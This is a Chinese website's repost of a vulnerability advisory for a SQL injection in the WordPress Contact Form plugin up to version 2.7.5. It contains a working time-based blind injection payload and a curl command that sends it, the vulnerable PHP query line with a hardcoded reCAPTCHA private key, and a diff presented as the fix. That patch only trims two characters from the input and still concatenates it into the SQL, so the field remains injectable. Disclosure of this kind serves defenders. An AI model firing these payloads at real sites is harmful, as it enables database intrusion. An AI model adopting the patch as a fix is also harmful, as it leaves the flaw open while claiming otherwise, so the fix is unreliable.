网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

WordPress插件Contact Form <= 2.7.5 SQL注射缺陷及修复

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: WordPress Contact Form plugin = 2.7.5 SQL Injection Vulnerability作者: Skraps (jackie.craig.sparks(at)live.com www.2cto.com jackie.craig.sparks(at)gmail.com @skraps_foo)下载地......

 

标题: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

作者: Skraps (jackie.craig.sparks(at)live.com www.2cto.com jackie.craig.sparks(at)gmail.com @skraps_foo)

下载地址: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip

已测试版本: 2.7.5

 

---------------

PoC (POST data)

---------------

http://www.2cto.com /wp-content/plugins/contact-form-wordpress/easy-form.class.php

wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

 

示例

curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

 

---------------

代码分析

---------------

Line 49:

    public function the_content($content) {

        global $wpdb;

        global $table_name;

        global $settings_table_name;

 

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

 

        if ($_POST['wpcf_easyform_submitted'] == 1) {

 

            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

 

---------------

补丁

---------------

 

*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400

--- ./easy-form.class.php   2011-10-13 19:51:21.442799615 -0400

***************

*** 54,61 ****

          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

          

          if ($_POST['wpcf_easyform_submitted'] == 1) {

!       

!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

              

              $continue = true;

              

--- 54,63 ----

          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

          

          if ($_POST['wpcf_easyform_submitted'] == 1) {

!               $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];

!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);

!           

!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

              

              $continue = true;

              

***************

*** 71,80 ****

              if ($continue) {

              

                  //loop through the fields of this form (read from DB) and build the message here

!                 $form_fields = $wpdb->get_results("

                    SELECT *

                    FROM $settings_table_name

!                   WHERE form_id = ".$_POST['wpcf_easyform_formid']."

                    ORDER BY position

                ");

                

--- 73,82 ----

              if ($continue) {

              

                  //loop through the fields of this form (read from DB) and build the message here

!       $form_fields = $wpdb->get_results("

                    SELECT *

                    FROM $settings_table_name

!                   WHERE form_id = ".$wpcf_easyform_formid."

                    ORDER BY position

                ");

               

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论